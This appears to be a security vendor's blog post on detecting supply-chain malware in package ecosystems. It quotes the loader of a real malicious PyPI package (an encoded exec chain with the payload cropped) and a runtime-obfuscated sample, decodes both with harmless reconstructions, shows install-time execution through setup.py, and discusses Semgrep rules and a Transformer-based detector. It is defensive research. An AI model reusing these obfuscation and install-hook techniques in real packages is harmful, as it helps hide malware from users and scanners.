Hello Evil World

Canvas Computing was born because we noticed that the rise of Supply-Chain attacks has severe consequences for the freedom with which we use and distribute open-source software. Campaigns like the Shai-Hulud npm attacks (2025) demonstrated how easily the trust placed in open-source software can be abused, and many threat actors are following the trend. The more you think about the number of potential attack vectors in a Supply-Chain compromise, the more you realize how difficult it is to protect against them. Given the latest capabilities and scale of agentic coding, those attacks will only grow in complexity and sophistication.

This post introduces different detection difficulty levels and the research we are applying to each of them. The levels help categorize research efforts and solutions.

Level 1: Evil Blobs

The simplest form of exploit is a monolithic block of malicious code inserted directly into a single file, e.g. within a package distributed through npm, PyPI, crates.io, etc.

░░░░░░░░░░░░░█████████░░░░░░░░░░░░░░░░ < evil package file
                ^ Malware Blob

One example is a malicious Python package named ForgyPs_2.0.0 that was identified by security researchers (the full malicious encoded payload was cropped):

import base64 as ______;import marshal as ____;import zlib as __________;from cryptography.fernet import Fernet;import base64;__mikey__="cWY0N2RzQzBhT04wY...05a766a33512d32576d3675";__vare__ = lambda x: ____.loads(__________.decompress(______.b32decode(______.b64decode(x[::-1]))));__mycip__= Fernet(base64.b64decode(__mikey__));__step1__=bytes.fromhex(mydata);__step2__=__mycip__.decrypt(__step1__);__decr__=base64.b64decode(__step2__);__decrdata__=__decr__;__gotnew__=base64.b32decode(__decr__);__newdecr__=79117779391;__getnew__=__newdecr__;__myb64code__=base64.b64decode(__gotnew__);__myb64codee__=base64.b64decode(__myb64code__);___ = __myb64codee__;exec(__vare__(___))

In this case the malware was placed in an arbitrary __init__.py file; it contains the whole exploit in a single encoded blob.
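
The decoder lambda __vare__ in the sample simply unwinds a fixed chain: reverse the string, base64-decode, base32-decode, zlib-decompress, then marshal-load a code object and exec it. A harmless reconstruction of that chain, with a benign payload in place of the cropped one:

```python
import base64
import marshal
import zlib

# Build a harmless blob the same way the malware does, in reverse order:
# marshal -> zlib -> base32 -> base64 -> string reversal.
code = compile("x = 40 + 2", "<demo>", "exec")
blob = base64.b64encode(base64.b32encode(zlib.compress(marshal.dumps(code))))[::-1]

# __vare__ from the sample above: undo each layer in order.
decoded = marshal.loads(zlib.decompress(base64.b32decode(base64.b64decode(blob[::-1]))))

ns = {}
exec(decoded, ns)  # the final exec(...) step of the malware
print(ns["x"])  # -> 42
```

Each layer on its own is a perfectly legitimate stdlib call; only the combination (and the final exec) is suspicious.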

Detecting Evil Blobs

How can you detect this evil payload? The problem is that most package managers execute code at installation time. So this code is already executed when you run pip install ForgyPs. Be careful when installing untrusted software, even from popular ecosystems.
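
To illustrate why installation itself is dangerous: for a source distribution, pip runs the package's setup.py as ordinary Python, so any top-level statement executes during installation. A minimal sketch with a hypothetical package name (the setup() call is commented out so the snippet stands alone):

```python
# setup.py of a hypothetical malicious sdist. pip executes this whole
# file during `pip install`, before any module of the package is imported.

def run_payload():
    # An attacker would place real code here; this stand-in only
    # returns a marker string.
    return "executed at install time"

result = run_payload()  # runs unconditionally at module top level
print(result)

# The legitimate-looking packaging part would follow:
# from setuptools import setup
# setup(name="forgyps", version="2.0.0")
```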

Many security researchers use tools like Opengrep or Semgrep and create rules for pattern detection. However, this approach is very brittle. Imagine you are writing a Semgrep rule for the base64.b64decode(...) call in this example:

rules:
  - id: suspicious-base64-decode
    pattern: base64.b64decode(...)
    message: Suspicious use of base64 decoding
    languages: [python]
    severity: WARNING

Either the pattern is too specific and only matches this single example, or it is too generic and creates many findings in trustworthy packages as well. This is why rule-based systems are not sufficient to identify malware at scale.
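
The false-positive side is easy to demonstrate: perfectly benign packages decode base64 all the time, e.g. for small inline assets or test fixtures, and the rule above flags every such call:

```python
import base64

# A benign call that the Semgrep rule above would still flag:
# many packages ship small binary assets or fixtures inline.
ICON_B64 = b"aGVsbG8gd29ybGQ="
icon = base64.b64decode(ICON_B64)
print(icon)  # -> b'hello world'
```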

Another malware example where rule-based or static code analysis fails is the following:

if sys.platform == ''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(((1 << 4) - 1) << 3) - 1, ((((3 << 2) + 1)) << 3) + 1, (7 << 4) - (1 << 1), ((((3 << 2) + 1)) << 2) - 1, (((3 << 3) + 1) << 1)])):
	if sys.argv[1] in [''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(((3 << 3) + 1) << 2) + 1, ((((3 << 2) + 1)) << 3) - 1, ((((3 << 2) + 1)) << 3) - 1, (3 << 5) - 1, ((((3 << 2) + 1)) << 3) + 1, (7 << 4) - (1 << 1), ((((3 << 2) + 1)) << 3) - (1 << 1), (7 << 4) - 1])), ''.join(map(getattr(__builtins__, oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + copyright.__str__()[4 << 0]), [(3 << 5) + (1 << 1), (((1 << 4) - 1) << 3) - 3, ((((3 << 2) + 1)) << 3) + 1, (((7 << 2) - 1) << 2), (((3 << 3) + 1) << 2)]))]:	
		馬女水女口目人馬鳥月水馬山山馬鸟 = 834*(395 & 643)+865//460-(104 | 469+415) | 104 << 313 << 357 >> (935 | 183) & ~61
...
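
What makes this sample hard for static rules is that even builtin names are assembled at runtime: the repeated join/map/getattr construct builds the string "chr" from the reprs of other builtins, then decodes integers produced by bit-shift arithmetic. A simplified reconstruction of the first comparison (we replace str(copyright) with the literal "Copyright", which starts the same way in CPython, and resolve the name via the builtins module instead of __builtins__):

```python
import builtins

# oct.__str__() is "<built-in function oct>" -> index -3 is 'c'
# hex.__str__() is "<built-in function hex>" -> index -4 is 'h'
# str(copyright) starts with "Copyright ..." -> index 4 is 'r'
name = oct.__str__()[-3 << 0] + hex.__str__()[-1 << 2] + "Copyright"[4 << 0]
print(name)  # -> chr

# The bit-shift expressions are just character codes for "win32":
platform = ''.join(map(getattr(builtins, name), [
    (((1 << 4) - 1) << 3) - 1,    # 119 -> 'w'
    ((((3 << 2) + 1)) << 3) + 1,  # 105 -> 'i'
    (7 << 4) - (1 << 1),          # 110 -> 'n'
    ((((3 << 2) + 1)) << 2) - 1,  # 51  -> '3'
    (((3 << 3) + 1) << 1),        # 50  -> '2'
]))
print(platform)  # -> win32
```

So the outer condition is just sys.platform == "win32", but no string literal ever appears for a pattern matcher to find.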

Many modern security vendors apply rule-based tooling in combination with Large Language Models (LLMs) for triaging. LLMs may eventually reduce the problem of false positives, but they do not solve the initial detection problem: if your first search query does not point to the right malicious file, your LLM might never see it. Additionally, scanning all files of many packages with LLMs is very costly, and cheaper models produce worse results and, again, more false positives.

This is why we are convinced that deeper research is required so that we do not lose trust in distributing software through open source.

malwi

Our initial research focused on malicious blobs. We stumbled across a promising paper that helped us create our first research project: malwi is based on the design of Zero Day Malware Detection with Alpha: Fast DBI with Transformer Models for Real World Application (2025). The idea is to compile any code to a bytecode-like structure and then apply a lightweight Transformer-based model like Longformer or DistilBERT to detect patterns.
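
A rough sketch of the first step, using Python's dis module to lower source code into an opcode token stream (the function and tokenization here are our illustration, not malwi's actual pipeline):

```python
import dis

def bytecode_tokens(source: str) -> list[str]:
    # Compile without executing, then walk all nested code objects
    # (functions, classes, comprehensions) and collect opcode names.
    stack = [compile(source, "<pkg>", "exec")]
    tokens = []
    while stack:
        code = stack.pop()
        for ins in dis.get_instructions(code):
            tokens.append(ins.opname)
            if hasattr(ins.argval, "co_code"):  # nested code object
                stack.append(ins.argval)
    return tokens

# The opcode stream is what a Transformer model would classify.
# (blob is only referenced in the source string, never executed.)
print(bytecode_tokens("import base64; data = base64.b64decode(blob)"))
```

Working on opcode streams rather than raw text makes the model robust against superficial obfuscation such as renamed identifiers.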

The challenge here was to get enough training data and to sanitize it properly, so that the malicious samples were not diluted with benign code. malwi achieved very good model performance scores based on DistilBERT (F1: 0.95) and even higher scores based on Longformer (F1: 0.99). However, we noticed that this research path does not scale well and has limitations.
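
For context, the F1 score is the harmonic mean of precision and recall, so a 0.99 requires both to be high (the precision/recall values below are hypothetical; the post only reports F1):

```python
def f1(precision: float, recall: float) -> float:
    # Harmonic mean: punishes imbalance between precision and recall.
    return 2 * precision * recall / (precision + recall)

print(round(f1(0.99, 0.99), 2))  # -> 0.99
print(round(f1(0.99, 0.50), 2))  # -> 0.66
```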

Only limited datasets are available for training a model, and only for a handful of languages. Even if you have a dataset of malicious packages or code, triaging the data turns out to be very difficult:

  • Which parts of the code must be used for training? Which parts can be excluded to avoid overflowing the model's context window?
  • Where does a malicious function start, and where does it stop?
  • How do you pre-process the code for training?

These questions are very difficult to answer. This insight pushed us to continue our research in other areas and with different techniques, and to define another malware category: Level 2: Evil Shards.